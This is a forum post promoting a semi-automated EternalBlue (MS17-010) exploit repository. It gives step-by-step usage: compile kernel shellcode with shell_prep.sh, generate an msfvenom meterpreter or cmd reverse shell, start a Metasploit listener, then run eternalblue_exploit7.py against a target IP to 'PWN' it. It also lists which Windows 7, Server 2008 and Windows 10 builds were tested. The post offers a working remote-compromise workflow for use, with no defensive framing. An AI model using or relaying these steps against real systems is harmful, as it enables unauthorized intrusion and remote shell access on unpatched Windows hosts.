Jump to content
Sign in to follow this  
BiosHell

This is just an semi-automated fully working, no-bs, non-metasploit version of the public exploit code for MS17-010 AKA EternalBlue

Recommended Posts

Download link https://github.com/3ndG4me/AutoBlue-MS17-010

 

TODO:

Testing with non-msfvenom shellcode

VIDEO TUTORIAL:

https://www.youtube.com/watch?v=p9OnxS1oDc0

USAGE:

Navigate to the shellcode directory in the repo:

run ./shell_prep.sh

Follow the prompts, for example:

_.-;;-._ '-..-'| || | '-..-'|_.-;;-._| '-..-'| || | '-..-'|_.-''-._| Eternal Blue Windows Shellcode Compiler Let's compile them windoos shellcodezzz Compiling x64 kernel shellcode Compiling x86 kernel shellcode kernel shellcode compiled, would you like to auto generate a reverse shell with msfvenom? (Y/n) y LHOST for reverse connection: <YOUR-IP> LPORT you want x64 to listen on: <SOME PORT> LPORT you want x86 to listen on: <SOME OTHER PORT> Type 0 to generate a meterpreter shell or 1 to generate a regular cmd shell 0

After the script finishes there will be a shellcode binary named sc_all.bin in the shellcode directory

Next, navigate to the main repo directory:

run listener_prep.sh

Follow the prompts, for example:

/,- ||) \\_, ) `--' Enternal Blue Metasploit Listener LHOST for reverse connection: <YOUR-IP> LPORT for x64 reverse connection: <SOME PORT> LPORT for x86 reverse connection: <SOME OTHER PORT> Enter 0 for meterpreter shell or 1 for regular cmd shell: 0 Starting listener...

PWN:

If you have completed the USAGE steps, now you're ready to PWN the target.

run:

python eternalblue_exploit7.py <TARGET-IP> <PATH/TO/SHELLCODE/sc_all.bin> <Number of Groom Connections (optional)>

This has only been tested on Windows 7/Server 2008, and Windows 10 10240 (x64)

However the exploit included in this repo also includes the Windows 8/Server 2012 version and should work.

The original exploit code that this repo pulls from is located here: https://github.com/worawit/MS17-010

Edited by BiosHell
  • Upvote 1

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Sign in to follow this  

×
×
  • Create New...